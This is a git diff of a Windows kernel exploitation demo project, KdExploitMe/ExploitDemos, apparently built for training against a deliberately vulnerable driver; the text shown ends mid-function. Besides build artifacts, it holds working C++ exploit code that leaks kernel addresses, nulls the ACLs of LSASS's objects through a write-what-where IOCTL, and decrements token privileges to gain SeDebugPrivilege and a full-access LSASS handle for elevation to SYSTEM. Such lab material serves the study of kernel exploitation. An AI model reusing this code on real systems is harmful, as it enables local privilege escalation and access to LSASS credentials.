diff --git a/ARM64/Debug/ExploitDemos.exe b/ARM64/Debug/ExploitDemos.exe
new file mode 100644
index 0000000..3c8d2dd
Binary files /dev/null and b/ARM64/Debug/ExploitDemos.exe differ
diff --git a/ARM64/Debug/ExploitDemos.ilk b/ARM64/Debug/ExploitDemos.ilk
new file mode 100644
index 0000000..bd22ebe
Binary files /dev/null and b/ARM64/Debug/ExploitDemos.ilk differ
diff --git a/ARM64/Debug/ExploitDemos.pdb b/ARM64/Debug/ExploitDemos.pdb
new file mode 100644
index 0000000..47dca5a
Binary files /dev/null and b/ARM64/Debug/ExploitDemos.pdb differ
diff --git a/ARM64/Win8.1 Release/KdExploitMe.pdb b/ARM64/Win8.1 Release/KdExploitMe.pdb
new file mode 100644
index 0000000..87a365f
Binary files /dev/null and b/ARM64/Win8.1 Release/KdExploitMe.pdb differ
diff --git a/ARM64/Win8.1Release/KdExploitMe.inf b/ARM64/Win8.1Release/KdExploitMe.inf
new file mode 100644
index 0000000..bae7fcd
--- /dev/null
+++ b/ARM64/Win8.1Release/KdExploitMe.inf
@@ -0,0 +1,32 @@
+;
+; KdExploitMe.inf
+;
+
+[Version]
+Signature="$WINDOWS NT$"
+Class=
+ClassGuid=
+Provider=
+DriverVer = 12/28/2025,11.25.39.263
+CatalogFile=
+
+[DestinationDirs]
+DefaultDestDir = 12
+
+
+[SourceDisksNames]
+1 = %DiskName%,,,""
+
+[SourceDisksFiles]
+
+
+[Manufacturer]
+%ManufacturerName%=Standard,NTARM64
+
+[Standard.NTARM64]
+
+
+[Strings]
+ManufacturerName=""
+ClassName=""
+DiskName="KdExploitMe Source Disk"
diff --git a/ExploitDemos/ARM64/Debug/ExploitDemos.Build.CppClean.log b/ExploitDemos/ARM64/Debug/ExploitDemos.Build.CppClean.log
new file mode 100644
index 0000000..d91b080
--- /dev/null
+++ b/ExploitDemos/ARM64/Debug/ExploitDemos.Build.CppClean.log
@@ -0,0 +1,8 @@
+c:\users\ayush\source\repos\kdexploitme\exploitdemos\arm64\debug\vc143.pdb
+c:\users\ayush\source\repos\kdexploitme\exploitdemos\arm64\debug\stdafx.obj
+c:\users\ayush\source\repos\kdexploitme\exploitdemos\arm64\debug\pooloverflow.obj
+c:\users\ayush\source\repos\kdexploitme\exploitdemos\arm64\debug\helpers.obj
+c:\users\ayush\source\repos\kdexploitme\exploitdemos\arm64\debug\genericattacks.obj
+c:\users\ayush\source\repos\kdexploitme\exploitdemos\arm64\debug\exploitdemos.tlog\cl.command.1.tlog
+c:\users\ayush\source\repos\kdexploitme\exploitdemos\arm64\debug\exploitdemos.tlog\cl.read.1.tlog
+c:\users\ayush\source\repos\kdexploitme\exploitdemos\arm64\debug\exploitdemos.tlog\cl.write.1.tlog
diff --git a/ExploitDemos/ARM64/Debug/ExploitDemos.exe.recipe b/ExploitDemos/ARM64/Debug/ExploitDemos.exe.recipe
new file mode 100644
index 0000000..f2732bc
--- /dev/null
+++ b/ExploitDemos/ARM64/Debug/ExploitDemos.exe.recipe
@@ -0,0 +1,11 @@
+
+
+
+
+ C:\Users\ayush\Source\Repos\KdExploitMe\ARM64\Debug\ExploitDemos.exe
+
+
+
+
+
+
\ No newline at end of file
diff --git a/ExploitDemos/ARM64/Debug/ExploitDemos.log b/ExploitDemos/ARM64/Debug/ExploitDemos.log
new file mode 100644
index 0000000..7278855
--- /dev/null
+++ b/ExploitDemos/ARM64/Debug/ExploitDemos.log
@@ -0,0 +1,16 @@
+ KernelAddressLeak.cpp
+C:\Users\ayush\Source\Repos\KdExploitMe\ExploitDemos\KernelAddressLeak.cpp(90,9): warning C4477: 'printf' : format string '%i' requires an argument of type 'int', but variadic argument 1 has type 'ULONG_PTR'
+ C:\Users\ayush\Source\Repos\KdExploitMe\ExploitDemos\KernelAddressLeak.cpp(90,9):
+ consider using '%lli' in the format string
+ C:\Users\ayush\Source\Repos\KdExploitMe\ExploitDemos\KernelAddressLeak.cpp(90,9):
+ consider using '%Ii' in the format string
+ C:\Users\ayush\Source\Repos\KdExploitMe\ExploitDemos\KernelAddressLeak.cpp(90,9):
+ consider using '%I64i' in the format string
+
+C:\Users\ayush\Source\Repos\KdExploitMe\ExploitDemos\KernelAddressLeak.cpp(141,40): warning C4312: 'type cast': conversion from 'DWORD' to 'HANDLE' of greater size
+C:\Users\ayush\Source\Repos\KdExploitMe\ExploitDemos\KernelAddressLeak.cpp(159,9): warning C4477: 'printf' : format string '%i' requires an argument of type 'int', but variadic argument 1 has type 'size_t'
+ C:\Users\ayush\Source\Repos\KdExploitMe\ExploitDemos\KernelAddressLeak.cpp(159,9):
+ consider using '%zi' in the format string
+
+C:\Users\ayush\Source\Repos\KdExploitMe\ExploitDemos\KernelAddressLeak.cpp(245,39): warning C4312: 'type cast': conversion from 'DWORD' to 'HANDLE' of greater size
+ ExploitDemos.vcxproj -> C:\Users\ayush\Source\Repos\KdExploitMe\ARM64\Debug\ExploitDemos.exe
diff --git a/ExploitDemos/ARM64/Debug/ExploitDemos.obj b/ExploitDemos/ARM64/Debug/ExploitDemos.obj
new file mode 100644
index 0000000..bd33305
Binary files /dev/null and b/ExploitDemos/ARM64/Debug/ExploitDemos.obj differ
diff --git a/ExploitDemos/ARM64/Debug/ExploitDemos.tlog/CL.command.1.tlog b/ExploitDemos/ARM64/Debug/ExploitDemos.tlog/CL.command.1.tlog
new file mode 100644
index 0000000..b888cb9
Binary files /dev/null and b/ExploitDemos/ARM64/Debug/ExploitDemos.tlog/CL.command.1.tlog differ
diff --git a/ExploitDemos/ARM64/Debug/ExploitDemos.tlog/CL.read.1.tlog b/ExploitDemos/ARM64/Debug/ExploitDemos.tlog/CL.read.1.tlog
new file mode 100644
index 0000000..abc8688
Binary files /dev/null and b/ExploitDemos/ARM64/Debug/ExploitDemos.tlog/CL.read.1.tlog differ
diff --git a/ExploitDemos/ARM64/Debug/ExploitDemos.tlog/CL.write.1.tlog b/ExploitDemos/ARM64/Debug/ExploitDemos.tlog/CL.write.1.tlog
new file mode 100644
index 0000000..c2f6e47
Binary files /dev/null and b/ExploitDemos/ARM64/Debug/ExploitDemos.tlog/CL.write.1.tlog differ
diff --git a/ExploitDemos/ARM64/Debug/ExploitDemos.tlog/Cl.items.tlog b/ExploitDemos/ARM64/Debug/ExploitDemos.tlog/Cl.items.tlog
new file mode 100644
index 0000000..1e98842
--- /dev/null
+++ b/ExploitDemos/ARM64/Debug/ExploitDemos.tlog/Cl.items.tlog
@@ -0,0 +1,6 @@
+C:\Users\ayush\Source\Repos\KdExploitMe\ExploitDemos\GenericAttacks.cpp;C:\Users\ayush\Source\Repos\KdExploitMe\ExploitDemos\ARM64\Debug\GenericAttacks.obj
+C:\Users\ayush\Source\Repos\KdExploitMe\ExploitDemos\ExploitDemos.cpp;C:\Users\ayush\Source\Repos\KdExploitMe\ExploitDemos\ARM64\Debug\ExploitDemos.obj
+C:\Users\ayush\Source\Repos\KdExploitMe\ExploitDemos\Helpers.cpp;C:\Users\ayush\Source\Repos\KdExploitMe\ExploitDemos\ARM64\Debug\Helpers.obj
+C:\Users\ayush\Source\Repos\KdExploitMe\ExploitDemos\KernelAddressLeak.cpp;C:\Users\ayush\Source\Repos\KdExploitMe\ExploitDemos\ARM64\Debug\KernelAddressLeak.obj
+C:\Users\ayush\Source\Repos\KdExploitMe\ExploitDemos\PoolOverflow.cpp;C:\Users\ayush\Source\Repos\KdExploitMe\ExploitDemos\ARM64\Debug\PoolOverflow.obj
+C:\Users\ayush\Source\Repos\KdExploitMe\ExploitDemos\stdafx.cpp;C:\Users\ayush\Source\Repos\KdExploitMe\ExploitDemos\ARM64\Debug\stdafx.obj
diff --git a/ExploitDemos/ARM64/Debug/ExploitDemos.tlog/ExploitDemos.lastbuildstate b/ExploitDemos/ARM64/Debug/ExploitDemos.tlog/ExploitDemos.lastbuildstate
new file mode 100644
index 0000000..785ca3c
--- /dev/null
+++ b/ExploitDemos/ARM64/Debug/ExploitDemos.tlog/ExploitDemos.lastbuildstate
@@ -0,0 +1,2 @@
+PlatformToolSet=v143:VCToolArchitecture=Native32Bit:VCToolsVersion=14.44.35207:TargetPlatformVersion=10.0.26100.0:
+Debug|ARM64|C:\Users\ayush\Source\Repos\KdExploitMe\|
diff --git a/ExploitDemos/ARM64/Debug/ExploitDemos.tlog/link.command.1.tlog b/ExploitDemos/ARM64/Debug/ExploitDemos.tlog/link.command.1.tlog
new file mode 100644
index 0000000..e80c419
Binary files /dev/null and b/ExploitDemos/ARM64/Debug/ExploitDemos.tlog/link.command.1.tlog differ
diff --git a/ExploitDemos/ARM64/Debug/ExploitDemos.tlog/link.read.1.tlog b/ExploitDemos/ARM64/Debug/ExploitDemos.tlog/link.read.1.tlog
new file mode 100644
index 0000000..fb56e2d
Binary files /dev/null and b/ExploitDemos/ARM64/Debug/ExploitDemos.tlog/link.read.1.tlog differ
diff --git a/ExploitDemos/ARM64/Debug/ExploitDemos.tlog/link.secondary.1.tlog b/ExploitDemos/ARM64/Debug/ExploitDemos.tlog/link.secondary.1.tlog
new file mode 100644
index 0000000..bfd2489
--- /dev/null
+++ b/ExploitDemos/ARM64/Debug/ExploitDemos.tlog/link.secondary.1.tlog
@@ -0,0 +1,2 @@
+^C:\USERS\AYUSH\SOURCE\REPOS\KDEXPLOITME\EXPLOITDEMOS\ARM64\DEBUG\EXPLOITDEMOS.OBJ|C:\USERS\AYUSH\SOURCE\REPOS\KDEXPLOITME\EXPLOITDEMOS\ARM64\DEBUG\GENERICATTACKS.OBJ|C:\USERS\AYUSH\SOURCE\REPOS\KDEXPLOITME\EXPLOITDEMOS\ARM64\DEBUG\HELPERS.OBJ|C:\USERS\AYUSH\SOURCE\REPOS\KDEXPLOITME\EXPLOITDEMOS\ARM64\DEBUG\KERNELADDRESSLEAK.OBJ|C:\USERS\AYUSH\SOURCE\REPOS\KDEXPLOITME\EXPLOITDEMOS\ARM64\DEBUG\POOLOVERFLOW.OBJ|C:\USERS\AYUSH\SOURCE\REPOS\KDEXPLOITME\EXPLOITDEMOS\ARM64\DEBUG\STDAFX.OBJ
+C:\Users\ayush\Source\Repos\KdExploitMe\ARM64\Debug\ExploitDemos.ILK
diff --git a/ExploitDemos/ARM64/Debug/ExploitDemos.tlog/link.write.1.tlog b/ExploitDemos/ARM64/Debug/ExploitDemos.tlog/link.write.1.tlog
new file mode 100644
index 0000000..f6231b3
Binary files /dev/null and b/ExploitDemos/ARM64/Debug/ExploitDemos.tlog/link.write.1.tlog differ
diff --git a/ExploitDemos/ARM64/Debug/ExploitDemos.vcxproj.FileListAbsolute.txt b/ExploitDemos/ARM64/Debug/ExploitDemos.vcxproj.FileListAbsolute.txt
new file mode 100644
index 0000000..e69de29
diff --git a/ExploitDemos/ARM64/Debug/GenericAttacks.obj b/ExploitDemos/ARM64/Debug/GenericAttacks.obj
new file mode 100644
index 0000000..948fa30
Binary files /dev/null and b/ExploitDemos/ARM64/Debug/GenericAttacks.obj differ
diff --git a/ExploitDemos/ARM64/Debug/Helpers.obj b/ExploitDemos/ARM64/Debug/Helpers.obj
new file mode 100644
index 0000000..bf04b6d
Binary files /dev/null and b/ExploitDemos/ARM64/Debug/Helpers.obj differ
diff --git a/ExploitDemos/ARM64/Debug/KernelAddressLeak.obj b/ExploitDemos/ARM64/Debug/KernelAddressLeak.obj
new file mode 100644
index 0000000..301b461
Binary files /dev/null and b/ExploitDemos/ARM64/Debug/KernelAddressLeak.obj differ
diff --git a/ExploitDemos/ARM64/Debug/PoolOverflow.obj b/ExploitDemos/ARM64/Debug/PoolOverflow.obj
new file mode 100644
index 0000000..fe8aa28
Binary files /dev/null and b/ExploitDemos/ARM64/Debug/PoolOverflow.obj differ
diff --git a/ExploitDemos/ARM64/Debug/stdafx.obj b/ExploitDemos/ARM64/Debug/stdafx.obj
new file mode 100644
index 0000000..95055dd
Binary files /dev/null and b/ExploitDemos/ARM64/Debug/stdafx.obj differ
diff --git a/ExploitDemos/ARM64/Debug/vc143.pdb b/ExploitDemos/ARM64/Debug/vc143.pdb
new file mode 100644
index 0000000..3017491
Binary files /dev/null and b/ExploitDemos/ARM64/Debug/vc143.pdb differ
diff --git a/ExploitDemos/ExploitDemos.cpp b/ExploitDemos/ExploitDemos.cpp
index cf09ee6..9b29f9c 100644
--- a/ExploitDemos/ExploitDemos.cpp
+++ b/ExploitDemos/ExploitDemos.cpp
@@ -1,87 +1,88 @@
-#pragma once
-
-#include "stdafx.h"
-#include "GenericAttacks.h"
-#include "PoolOverflow.h"
-#include "KernelAddressLeak.h"
-#include
-
-using namespace std;
-
-void PrintHelpMenu()
-{
- printf("ExploitDemos Help:\n");
- printf("Demonstrates exploiting the KdExploitMe driver.\n");
- printf("--------------\n");
- printf("ExploitDemos.exe -ExploitNumber\n");
- printf(" -01 : Demo METHOD_WRITEWHATWHERE - NULL EPROCESS ACL.\n");
- printf(" -02 : Demo METHOD_DECADDRESS - Modify token privileges.\n");
- printf(" -03 : Demo METHOD_OVERFLOWPOOL - 0xbad0b0b0, Non-Paged Pool, 64bit only.\n");
-}
-
-int _tmain(int argc, _TCHAR* argv[])
-{
- string dummy = NULL;
- if (argc != 2)
- {
- PrintHelpMenu();
- return -1;
- }
-
- printf("Press any key and hit enter to continue...\n");
- cin >> dummy;
-
- HANDLE hDevice;
- DWORD errNum;
-
-
- UNREFERENCED_PARAMETER(argc);
- UNREFERENCED_PARAMETER(argv);
-
- //
- // open the device
- //
-
- if ((hDevice = CreateFile(L"\\\\.\\KdExploitMe",
- GENERIC_READ | GENERIC_WRITE,
- 0,
- NULL,
- CREATE_ALWAYS,
- FILE_ATTRIBUTE_NORMAL,
- NULL)) == INVALID_HANDLE_VALUE) {
-
- errNum = GetLastError();
-
- printf("- CreateFile failed! Error code = 0x%x\n", errNum);
-
- return 0;
- }
-
-
- int exploitNumber = stoi(argv[1]+1);
- switch (exploitNumber)
- {
- case 1:
- AttackWriteWhatWhere(hDevice);
- break;
- case 2:
- AttackDecAddress(hDevice);
- break;
- case 3:
- AttackPO_BAD0B0B0(hDevice);
- break;
- default:
- PrintHelpMenu();
- break;
- }
-
-
- //
- // close the handle to the device.
- //
- CloseHandle(hDevice);
-}
-
-
-
-
+#pragma once
+
+#include "stdafx.h"
+#include "GenericAttacks.h"
+#include "PoolOverflow.h"
+#include "KernelAddressLeak.h"
+#include
+
+using namespace std;
+
+void PrintHelpMenu()
+{
+ printf("ExploitDemos Help:\n");
+ printf("Demonstrates exploiting the KdExploitMe driver.\n");
+ printf("--------------\n");
+ printf("ExploitDemos.exe -ExploitNumber\n");
+ printf(" -01 : Demo METHOD_WRITEWHATWHERE - NULL EPROCESS ACL.\n");
+ printf(" -02 : Demo METHOD_DECADDRESS - Modify token privileges.\n");
+ printf(" -03 : Demo METHOD_OVERFLOWPOOL - 0xbad0b0b0, Non-Paged Pool, 64bit only.\n");
+}
+
+int _tmain(int argc, _TCHAR* argv[])
+{
+ string dummy = NULL;
+ if (argc != 2)
+ {
+ PrintHelpMenu();
+ return -1;
+ }
+
+ printf("Press any key and hit enter to continue...\n");
+ cin >> dummy;
+
+ HANDLE hDevice;
+ DWORD errNum;
+
+
+ UNREFERENCED_PARAMETER(argc);
+ UNREFERENCED_PARAMETER(argv);
+
+ //
+ // open the device
+ //
+
+ if ((hDevice = CreateFileA("\\\\.\\KdExploitMe",
+ GENERIC_READ | GENERIC_WRITE,
+ 0,
+ NULL,
+ CREATE_ALWAYS,
+ FILE_ATTRIBUTE_NORMAL,
+ NULL)) == INVALID_HANDLE_VALUE) {
+
+ errNum = GetLastError();
+
+ printf("- CreateFile failed! Error code = 0x%x\n", errNum);
+
+ return 0;
+ }
+
+
+ int exploitNumber = stoi(argv[1]+1);
+ switch (exploitNumber)
+ {
+ case 1:
+ AttackWriteWhatWhere(hDevice);
+ break;
+ case 2:
+ AttackDecAddress(hDevice);
+ break;
+ case 3:
+ AttackPO_BAD0B0B0(hDevice);
+ break;
+ default:
+ PrintHelpMenu();
+ break;
+ }
+
+
+ //
+ // close the handle to the device.
+ //
+ CloseHandle(hDevice);
+}
+
+
+
+
+
diff --git a/ExploitDemos/ExploitDemos.vcxproj b/ExploitDemos/ExploitDemos.vcxproj
index a0b176b..f04ff56 100644
--- a/ExploitDemos/ExploitDemos.vcxproj
+++ b/ExploitDemos/ExploitDemos.vcxproj
@@ -1,175 +1,190 @@
-
-
-
-
- Debug
- Win32
-
-
- Debug
- x64
-
-
- Release
- Win32
-
-
- Release
- x64
-
-
-
- {D6194E14-75CE-456F-8771-2C7EF4455384}
- Win32Proj
- ExploitDemos
-
-
-
- Application
- true
- v120
- Unicode
-
-
- Application
- true
- v120
- Unicode
-
-
- Application
- false
- v120
- true
- Unicode
-
-
- Application
- false
- v120
- true
- Unicode
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
- true
-
-
- true
-
-
- false
-
-
- false
-
-
-
- Use
- Level3
- Disabled
- WIN32;_DEBUG;_CONSOLE;_LIB;%(PreprocessorDefinitions)
- true
-
-
- Console
- true
-
-
-
-
- Use
- Level3
- Disabled
- WIN32;_DEBUG;_CONSOLE;_LIB;%(PreprocessorDefinitions)
- true
-
-
- Console
- true
-
-
-
-
- Level3
- Use
- MaxSpeed
- true
- true
- WIN32;NDEBUG;_CONSOLE;_LIB;%(PreprocessorDefinitions)
- true
- Sync
- Default
- MultiThreaded
-
-
- Console
- true
- true
- true
-
-
-
-
- Level3
- Use
- MaxSpeed
- true
- true
- WIN32;NDEBUG;_CONSOLE;_LIB;%(PreprocessorDefinitions)
- true
- Sync
- CompileAsCpp
- MultiThreaded
-
-
- Console
- true
- true
- true
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
- Create
- Create
- Create
- Create
-
-
-
-
-
+
+
+
+
+ Debug
+ ARM64
+
+
+ Debug
+ Win32
+
+
+ Debug
+ x64
+
+
+ Release
+ ARM64
+
+
+ Release
+ Win32
+
+
+ Release
+ x64
+
+
+
+ {D6194E14-75CE-456F-8771-2C7EF4455384}
+ Win32Proj
+ ExploitDemos
+ 10.0.26100.0
+
+
+
+ Application
+ true
+ v143
+ Unicode
+
+
+ Application
+ true
+ v143
+ Unicode
+
+
+ Application
+ false
+ v143
+ true
+ Unicode
+
+
+ Application
+ false
+ v143
+ true
+ Unicode
+
+
+ v143
+
+
+ v143
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ true
+
+
+ true
+
+
+ false
+
+
+ false
+
+
+
+ Use
+ Level3
+ Disabled
+ WIN32;_DEBUG;_CONSOLE;_LIB;%(PreprocessorDefinitions)
+ true
+
+
+ Console
+ true
+
+
+
+
+ Use
+ Level3
+ Disabled
+ WIN32;_DEBUG;_CONSOLE;_LIB;%(PreprocessorDefinitions)
+ true
+
+
+ Console
+ true
+
+
+
+
+ Level3
+ Use
+ MaxSpeed
+ true
+ true
+ WIN32;NDEBUG;_CONSOLE;_LIB;%(PreprocessorDefinitions)
+ true
+ Sync
+ Default
+ MultiThreaded
+
+
+ Console
+ true
+ true
+ true
+
+
+
+
+ Level3
+ Use
+ MaxSpeed
+ true
+ true
+ WIN32;NDEBUG;_CONSOLE;_LIB;%(PreprocessorDefinitions)
+ true
+ Sync
+ CompileAsCpp
+ MultiThreaded
+
+
+ Console
+ true
+ true
+ true
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ Create
+ Create
+ Create
+ Create
+
+
+
+
+
\ No newline at end of file
diff --git a/ExploitDemos/ExploitDemos.vcxproj.filters b/ExploitDemos/ExploitDemos.vcxproj.filters
index 2ac7689..93deed9 100644
--- a/ExploitDemos/ExploitDemos.vcxproj.filters
+++ b/ExploitDemos/ExploitDemos.vcxproj.filters
@@ -1,69 +1,69 @@
-
-
-
-
- {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
- cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx
-
-
- {93995380-89BD-4b04-88EB-625FBE52EBFB}
- h;hh;hpp;hxx;hm;inl;inc;xsd
-
-
- {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
- rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
-
-
- {dd2c5aff-a33c-4e30-9142-482508ddec08}
-
-
- {5b888192-e0eb-4efe-adf1-ef8a9fd888c4}
-
-
-
-
-
-
-
- Header Files
-
-
- Header Files
-
-
- Header Files
-
-
- Header Files\AttackIOCTL
-
-
- Header Files\AttackIOCTL
-
-
- Header Files
-
-
- Header Files
-
-
-
-
- Source Files
-
-
- Source Files
-
-
- Source Files
-
-
- Source Files\AttackIOCTL
-
-
- Source Files\AttackIOCTL
-
-
- Source Files
-
-
+
+
+
+
+ {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
+ cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx
+
+
+ {93995380-89BD-4b04-88EB-625FBE52EBFB}
+ h;hh;hpp;hxx;hm;inl;inc;xsd
+
+
+ {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
+ rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
+
+
+ {dd2c5aff-a33c-4e30-9142-482508ddec08}
+
+
+ {5b888192-e0eb-4efe-adf1-ef8a9fd888c4}
+
+
+
+
+
+
+
+ Header Files
+
+
+ Header Files
+
+
+ Header Files
+
+
+ Header Files\AttackIOCTL
+
+
+ Header Files\AttackIOCTL
+
+
+ Header Files
+
+
+ Header Files
+
+
+
+
+ Source Files
+
+
+ Source Files
+
+
+ Source Files
+
+
+ Source Files\AttackIOCTL
+
+
+ Source Files\AttackIOCTL
+
+
+ Source Files
+
+
\ No newline at end of file
diff --git a/ExploitDemos/ExploitDemos.vcxproj.user b/ExploitDemos/ExploitDemos.vcxproj.user
new file mode 100644
index 0000000..0f14913
--- /dev/null
+++ b/ExploitDemos/ExploitDemos.vcxproj.user
@@ -0,0 +1,4 @@
+
+
+
+
\ No newline at end of file
diff --git a/ExploitDemos/GenericAttacks.cpp b/ExploitDemos/GenericAttacks.cpp
index 09e3e0b..74a917b 100644
--- a/ExploitDemos/GenericAttacks.cpp
+++ b/ExploitDemos/GenericAttacks.cpp
@@ -1,200 +1,200 @@
-#pragma once
-#include "stdafx.h"
-#include "GenericAttacks.h"
-#include "KernelAddressLeak.h"
-#include "Structures.h"
-
-
-// This function will overwrite the ACL of all objects that LSASS has opened with a NULL ACL.
-// This effectively removes the ACL, which will allow anyone to open a PROCESS_ALL_ACCESS handle to lsass
-// and do DLL injection (or another technique) to elevate to SYSTEM.
-// See https://media.blackhat.com/bh-us-12/Briefings/Cerrudo/BH_US_12_Cerrudo_Windows_Kernel_WP.pdf
-// Test on Windows 6.1 x86/x64
-BOOL AttackWriteWhatWhere(HANDLE hDevice)
-{
- BOOL functionSuccess = false;
- DWORD processId = 0;
- PVOID* objectAddresses = NULL;
- size_t objectCount = 0;
- BOOL bRc = false;
- void* ioctlDest = NULL;
- DATACOPY* dataCopy = NULL;
- void* ioctlSrc = NULL;
- HANDLE hLsass = NULL;
-
- printf("+ Entering AttackWriteWhatWhere.\n");
-
- //Get the process ID of lsass
- BOOL success = GetProcessIdByName(L"lsass.exe", &processId);
- if (!success)
- {
- printf("- Failed to get process by name.\n");
- goto Cleanup;
- }
- printf("+ Process ID of LSASS: 0x%x\n", processId);
-
- //Leak the addresses of all the process handles LSASS has opened
- success = LeakProcessObjectAddresses((HANDLE)processId, &objectAddresses, &objectCount);
- if (!success)
- {
- printf("- Failed to call LeakProcessObjectAddresses.\n");
- goto Cleanup;
- }
-
-
- for (size_t i = 0; i < objectCount; i++)
- {
- //
- // Performing WriteWhatWhere to null process ACL
- //
- DWORD bytesReturned = 0;
- dataCopy = new DATACOPY();
- DWORD overwriteSize = sizeof(PVOID);
- ioctlSrc = malloc(overwriteSize);
- SecureZeroMemory(ioctlSrc, overwriteSize);
-
- dataCopy->Dest = PVOID((UINT_PTR)objectAddresses[i] - overwriteSize);
- dataCopy->DestLength = overwriteSize;
- dataCopy->Source = ioctlSrc;
- dataCopy->SourceLength = overwriteSize;
-
- ioctlDest = malloc(overwriteSize);
-
- printf("+ Overwriting address: 0x%p\n", dataCopy->Dest);
-
- bRc = DeviceIoControl(hDevice,
- (DWORD)IOCTL_KDEXPLOITME_METHOD_WRITEWHATWHERE,
- dataCopy,
- sizeof(*dataCopy),
- ioctlDest, //Won't actually be used in this exploit
- overwriteSize,
- &bytesReturned,
- NULL
- );
-
-
- if (!bRc)
- {
- printf("- Error in DeviceIoControl : %d\n", GetLastError());
- goto Cleanup;
- }
- }
-
-
- //Attempt to get a handle to LSASS, which is normally not possible, but should be possible after running the exploit
- hLsass = OpenProcess(PROCESS_ALL_ACCESS, false, processId);
- if (!hLsass)
- {
- printf("- Error opening a HANDLE to LSASS. Error code: 0x%x\n", GetLastError());
- goto Cleanup;
- }
- printf("+ Successfully opened a full access handle to LSASS. Exploit worked!.\n");
-
-
- functionSuccess = true;
-
-Cleanup:
- if (objectAddresses)
- {
- free(objectAddresses);
- objectAddresses = NULL;
- }
- if (ioctlSrc)
- {
- free(ioctlSrc);
- ioctlSrc = NULL;
- }
- if (ioctlDest)
- {
- free(ioctlDest);
- ioctlDest = NULL;
- }
- if (dataCopy)
- {
- delete dataCopy;
- dataCopy = NULL;
- }
- if (hLsass)
- {
- CloseHandle(hLsass);
- hLsass = NULL;
- }
-
- return functionSuccess;
-}
-
-// This will decrement the privileges held by the current process by 1. This will effectively turn on almost all privileges
-// for the process, including SeDebugPrivilege. With SeDebugPrivilege, you can do DLL injection in to any process.
-// See https://media.blackhat.com/bh-us-12/Briefings/Cerrudo/BH_US_12_Cerrudo_Windows_Kernel_WP.pdf
-// Test on Windows 6.1 x86/x64
-BOOL AttackDecAddress(HANDLE hDevice)
-{
- BOOL functionSuccess = false;
- PVOID tokenAddress = NULL;
- PVOID privilegeAddress = NULL;
- BOOL success = false;
- size_t ioctlDest = 0;
- DWORD bytesReturned = 0;
- DECADDRESS inBuf = { 0 };
- HANDLE hLsass = NULL;
- DWORD lsassProcId = 0;
-
- success = LeakCurrentUserTokenAddress(&tokenAddress);
- if (!success)
- {
- printf("- Error calling LeakCurrentUserTokenAddress.\n");
- goto Cleanup;
- }
-
- privilegeAddress = (PVOID)((UINT_PTR)tokenAddress + 0x48);
-
- inBuf.Value = (size_t*)privilegeAddress;
- inBuf.Dec = TRUE;
-
- printf("+ Decrementing memory at address: 0x%p\n", inBuf.Value);
-
- BOOL bRc = DeviceIoControl(hDevice,
- (DWORD)IOCTL_KDEXPLOITME_METHOD_DECADDRESS,
- &inBuf,
- sizeof(inBuf),
- &ioctlDest, //Won't actually be used in this exploit
- sizeof(ioctlDest),
- &bytesReturned,
- NULL
- );
-
- if (!bRc)
- {
- printf("- Error in DeviceIoControl : %d\n", GetLastError());
- goto Cleanup;
- }
-
- //Get the process ID of lsass
- success = GetProcessIdByName(L"lsass.exe", &lsassProcId);
- if (!success)
- {
- printf("- Failed to get process by name.\n");
- goto Cleanup;
- }
- printf("+ Process ID of LSASS: 0x%x\n", lsassProcId);
-
- //Attempt to get a handle to LSASS, which is normally not possible, but should be possible after running the exploit
- hLsass = OpenProcess(PROCESS_ALL_ACCESS, false, lsassProcId);
- if (!hLsass)
- {
- printf("- Error opening a HANDLE to LSASS. Error code: 0x%x\n", GetLastError());
- goto Cleanup;
- }
- printf("+ Successfully opened a full access handle to LSASS. Exploit worked!.\n");
-
- functionSuccess = true;
-
-Cleanup:
- if (hLsass)
- {
- CloseHandle(hLsass);
- hLsass = NULL;
- }
-
- return functionSuccess;
-}
+#pragma once
+#include "stdafx.h"
+#include "GenericAttacks.h"
+#include "KernelAddressLeak.h"
+#include "Structures.h"
+
+
+// This function will overwrite the ACL of all objects that LSASS has opened with a NULL ACL.
+// This effectively removes the ACL, which will allow anyone to open a PROCESS_ALL_ACCESS handle to lsass
+// and do DLL injection (or another technique) to elevate to SYSTEM.
+// See https://media.blackhat.com/bh-us-12/Briefings/Cerrudo/BH_US_12_Cerrudo_Windows_Kernel_WP.pdf
+// Test on Windows 6.1 x86/x64
+BOOL AttackWriteWhatWhere(HANDLE hDevice)
+{
+ BOOL functionSuccess = false;
+ DWORD processId = 0;
+ PVOID* objectAddresses = NULL;
+ size_t objectCount = 0;
+ BOOL bRc = false;
+ void* ioctlDest = NULL;
+ DATACOPY* dataCopy = NULL;
+ void* ioctlSrc = NULL;
+ HANDLE hLsass = NULL;
+
+ printf("+ Entering AttackWriteWhatWhere.\n");
+
+ //Get the process ID of lsass
+ BOOL success = GetProcessIdByName(L"lsass.exe", &processId);
+ if (!success)
+ {
+ printf("- Failed to get process by name.\n");
+ goto Cleanup;
+ }
+ printf("+ Process ID of LSASS: 0x%x\n", processId);
+
+ //Leak the addresses of all the process handles LSASS has opened
+ success = LeakProcessObjectAddresses((HANDLE)processId, &objectAddresses, &objectCount);
+ if (!success)
+ {
+ printf("- Failed to call LeakProcessObjectAddresses.\n");
+ goto Cleanup;
+ }
+
+
+ for (size_t i = 0; i < objectCount; i++)
+ {
+ //
+ // Performing WriteWhatWhere to null process ACL
+ //
+ DWORD bytesReturned = 0;
+ dataCopy = new DATACOPY();
+ DWORD overwriteSize = sizeof(PVOID);
+ ioctlSrc = malloc(overwriteSize);
+ SecureZeroMemory(ioctlSrc, overwriteSize);
+
+ dataCopy->Dest = PVOID((UINT_PTR)objectAddresses[i] - overwriteSize);
+ dataCopy->DestLength = overwriteSize;
+ dataCopy->Source = ioctlSrc;
+ dataCopy->SourceLength = overwriteSize;
+
+ ioctlDest = malloc(overwriteSize);
+
